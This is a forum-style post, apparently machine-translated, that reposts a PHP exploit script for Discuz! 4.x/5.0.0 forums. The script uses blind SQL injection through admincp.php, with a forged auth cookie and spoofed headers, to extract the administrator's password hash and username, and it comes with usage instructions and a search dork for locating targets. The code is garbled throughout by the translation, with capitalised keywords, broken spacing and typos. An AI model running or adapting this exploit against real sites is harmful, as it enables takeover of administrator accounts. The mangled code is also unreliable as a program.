I sent Discuz some time ago! EXP of version 5.0.0 GBK
I saw the 4. x in CN. Tink today. I went to the origin site and found a Discuz! 4.1.0 has been tested. The test succeeds. See the following: Discuz! Some of the EXP in version 5.0.0 GBK does not know how to use it. I told you that some of my friends still don't understand it. This time I cut the figure and, if you don't know how to use it, you should understand it.
Figure:
Copy codeThe Code is as follows: <? Php
Print_r ('
---------------------------------------------------------------------------
Discuz! 4. x SQL injection/admin credentials disclosure exploit
By rgod rgod@autistici.org
Site: http://retrogod.altervista.org
Dork: "powered by discuz!
---------------------------------------------------------------------------
');
If ($ argc <3 ){
Print_r ('
---------------------------------------------------------------------------
Usage: php '. $ argv [0]. 'Host path OPTIONS
Host: target server (ip/hostname)
Path: path to discuz
Options:
-P [port]: specify a port other than 80
-P [ip: port]: specify a proxy
Example:
Php '. $ argv [0]. 'localhost/discuz/-P1.1.1.1: 80
Php '. $ argv [0]. 'localhost/discuz/-p81
---------------------------------------------------------------------------
');
Die;
}
Error_reporting (0 );
Ini_set ("max_execution_time", 0 );
Ini_set ("default_socket_timeout", 5 );
Function quick_dump ($ string)
{
$ Result = ''; $ exa =''; $ cont = 0;
For ($ I = 0; $ I <= strlen ($ string)-1; $ I ++)
{
If (ord ($ string [$ I]) <= 32) | (ord ($ string [$ I])> 126 ))
{$ Result. = ".";}
Else
{$ Result. = "". $ string [$ I];}
If (strlen (dechex (ord ($ string [$ I]) = 2)
{$ Exa. = "". dechex (ord ($ string [$ I]);}
Else
{$ Exa. = "0". dechex (ord ($ string [$ I]);}
$ Cont ++; if ($ cont = 15) {$ cont = 0; $ result. = "\ r \ n"; $ exa. = "\ r \ n ";}
}
Return $ exa. "\ r \ n". $ result;
}
$ Proxy_regex = '(\ B \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3 }\:\ d {1, 5} \ B )';
Function sendpacketii ($ packet)
{
Global $ proxy, $ host, $ port, $ html, $ proxy_regex;
If ($ proxy = ''){
$ Ock = fsockopen (gethostbyname ($ host), $ port );
If (! $ Ock ){
Echo 'no response from '. $ host.': '. $ port; die;
}
}
Else {
$ C = preg_match ($ proxy_regex, $ proxy );
If (! $ C ){
Echo 'not a valid proxy... '; die;
}
$ Parts = explode (':', $ proxy );
Echo "Connecting to". $ parts [0]. ":". $ parts [1]. "proxy... \ r \ n ";
$ Ock = fsockopen ($ parts [0], $ parts [1]);
If (! $ Ock ){
Echo 'no response from proxy... '; die;
}
}
Fputs ($ ock, $ packet );
If ($ proxy = ''){
$ Html = '';
While (! Feof ($ ock )){
$ Html. = fgets ($ ock );
}
}
Else {
$ Html = '';
While ((! Feof ($ ock) or (! Eregi (chr (0x0d). chr (0x0a). chr (0x0d). chr (0x0a), $ html ))){
$ Html. = fread ($ ock, 1 );
}
}
Fclose ($ ock );
}
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Port = 80;
$ Proxy = "";
For ($ I = 3; $ I <$ argc; $ I ++ ){
$ Temp = $ argv [$ I] [0]. $ argv [$ I] [1];
If ($ temp = "-p ")
{
$ Port = str_replace ("-p", "", $ argv [$ I]);
}
If ($ temp = "-P ")
{
$ Proxy = str_replace ("-P", "", $ argv [$ I]);
}
}
If ($ path [0] <> '/') or ($ path [strlen ($ path)-1] <> '/')) {echo 'error... check the path! '; Die ;}
If ($ proxy = '') {$ p = $ path;} else {$ p = 'HTTP ://'. $ host. ':'. $ port. $ path ;}
Echo "please wait... \ n ";
// From global. func. php
Function authcode ($ string, $ operation, $ key = ''){
$ Key = $ key? $ Key: $ GLOBALS ['discuz _ auth_key '];
$ Coded = '';
$ Keylength = 32;
$ String = $ operation = 'decode '? Base64_decode ($ string): $ string;
For ($ I = 0; $ I <strlen ($ string); $ I ++ = 32 ){
$ Coded. = substr ($ string, $ I, 32) ^ $ key;
}
$ Coded = $ operation = 'encoding '? Str_replace ('=', '', base64_encode ($ coded): $ coded;
Return $ coded;
}
// Stolen from install. php
Function random ($ length ){
$ Hash = '';
$ Chars = 'abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxy ';
$ Max = strlen ($ chars)-1;
Mt_srand (double) microtime () * 1000000 );
For ($ I = 0; $ I <$ length; $ I ++ ){
$ Hash. = $ chars [mt_rand (0, $ max)];
}
Return $ hash;
}
$ Agent = "Googlebot/2.1 ";
// See SQL errors... you need auth key,
// It's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask
$ Tt = ""; for ($ I = 0; $ I <= 255; $ I ++) {$ tt. = chr ($ I );}
While (1)
{
$ Discuz_auth_key = random (32 );
$ Packet = "GET". $ p. "admincp. php? Action = recyclebin HTTP/1.0 \ r \ n ";
$ Packet. = "CLIENT-IP: 999.999.999.999 \ r \ n"; // spoof
$ Packet. = "User-Agent: $ agent \ r \ n ";
$ Packet. = "Host:". $ host. "\ r \ n ";
$ Packet. = "Cookie: adminid = 1; cdb_sid = 1; cdb_auth = ". authcode ("suntzu \ tsuntzu \ t ". $ tt, "ENCODE "). "; \ r \ n ";
$ Packet. = "Accept: text/plain \ r \ n ";
$ Packet. = "Connection: Close \ r \ n ";
$ Packet. = $ data;
Sendpacketii ($ packet );
$ Html = html_entity_decode ($ html );
$ Html = str_replace ("<br/>", "", $ html );
$ T = explode ("AND m. password = '", $ html );
$ T2 = explode ("'", $ t [1]);
$ Pwd_f = $ t2 [0];
$ T = explode ("AND m. secques = '", $ html );
$ T2 = explode ("'\ n", $ t [1]);
$ Secques_f = $ t2 [0];
$ T = explode ("AND m. uid = '", $ html );
$ T2 = explode ("'\ x0d", $ t [1]);
$ Uid_f = $ t2 [0];
$ My_string = $ pwd_f. "\ t". $ secques_f. "\ t". $ uid_f;
If (strlen ($ my_string) = 270) and (! Eregi ("=", $ my_string ))){
Break;
}
}
$ Temp = authcode ("suntzu \ tsuntzu \ t". $ tt, "ENCODE ");
// Calculating key...
$ Key = "";
For ($ j = 0; $ j <32; $ j ++ ){
For ($ I = 0; I I <255; $ I ++ ){
$ Aa = "";
If ($ j <> 0 ){
For ($ k = 1; $ k <= $ j; $ k ++ ){
$ Aa. = "";
}
}
$ GLOBALS ['discuz _ auth_key '] = $ aa. chr ($ I );
$ T = authcode ($ temp, "DECODE ");
If ($ t [$ j] ==$ my_string [$ j]) {
$ Key. = chr ($ I );
}
}
}
// Echo "auth key->". $ key. "\ r \ n ";
$ GLOBALS ['discuz _ auth_key '] = $ key;
Echo "pwd hash (md5)-> ";
$ Chars [0] = 0; // null
$ Chars = array_merge ($ chars, range (48, 57); // numbers
$ Chars = array_merge ($ chars, range (97,102); // a-f letters
$ J = 1; $ password = "";
While (! Strstr ($ password, chr (0 )))
{
For ($ I = 0; $ I <= 255; $ I ++)
{
If (in_array ($ I, $ chars ))
{
// You can use every char because of base64_decode ()... so this bypass magic quotes...
// And some help by extract () to overwrite vars
$ SQL = "999999 '/**/UNION/**/SELECT, (IF (ASCII (SUBSTRING (m. password, $ j, 1) = ". $ I., 1, 1/**/FROM/**/cdb_sessions/**/s, /**/cdb_members/**/m/**/WHERE/**/adminid = 1/**/LIMIT/**/1 /*";
$ Packet = "GET". $ p. "admincp. php? Action = recyclebin & HTTP/1.0 \ r \ n ";
$ Packet. = "User-Agent: $ agent \ r \ n ";
$ Packet. = "CLIENT-IP: 1.2.3.4 \ r \ n ";
$ Packet. = "Host:". $ host. "\ r \ n ";
$ Packet. = "Cookie: adminid = 1; cdb_sid = 1; cdb_auth = ". authcode ("suntzu \ tsuntzu \ t ". $ SQL, "ENCODE "). "; \ r \ n ";
$ Packet. = "Accept: text/plain \ r \ n ";
$ Packet. = "Connection: Close \ r \ n ";
$ Packet. = $ data;
Sendpacketii ($ packet );
If (eregi ("action = groupexpiry", $ html )){
$ Password. = chr ($ I); echo chr ($ I); sleep (1); break;
}
}
If ($ I == 255 ){
Die ("\ nExploit failed ...");
}
}
$ J ++;
}
Echo "\ nadmin user-> ";
$ J = 1; $ admin = "";
While (! Strstr ($ admin, chr (0 )))
{
For ($ I = 0; $ I <= 255; $ I ++)
{
$ SQL = "999999 '/**/UNION/**/SELECT, (IF (ASCII (SUBSTRING (m. username, $ j, 1) = ". $ I., 1, 1/**/FROM/**/cdb_sessions/**/s, /**/cdb_members/**/m/**/WHERE/**/adminid = 1/**/LIMIT/**/1 /*";
$ Packet = "GET". $ p. "admincp. php? Action = recyclebin & HTTP/1.0 \ r \ n ";
$ Packet. = "User-Agent: $ agent \ r \ n ";
$ Packet. = "CLIENT-IP: 1.2.3.4 \ r \ n ";
$ Packet. = "Host:". $ host. "\ r \ n ";
$ Packet. = "Cookie: adminid = 1; cdb_sid = 1; cdb_auth = ". authcode ("suntzu \ tsuntzu \ t ". $ SQL, "ENCODE "). "; \ r \ n ";
$ Packet. = "Accept: text/plain \ r \ n ";
$ Packet. = "Connection: Close \ r \ n ";
$ Packet. = $ data;
Sendpacketii ($ packet );
If (eregi ("action = groupexpiry", $ html )){
$ Admin. = chr ($ I); echo chr ($ I); sleep (1); break;
}
If ($ I = 255) {die ("\ nExploit failed ...");}
}
$ J ++;
}
Function is_hash ($ hash)
{
If (ereg ("^ [a-f0-9] {32}", trim ($ hash) {return true ;}
Else {return false ;}
}
If (is_hash ($ password )){
Echo "exploit succeeded ...";
}
Else {
Echo "exploit failed ...";
}
?>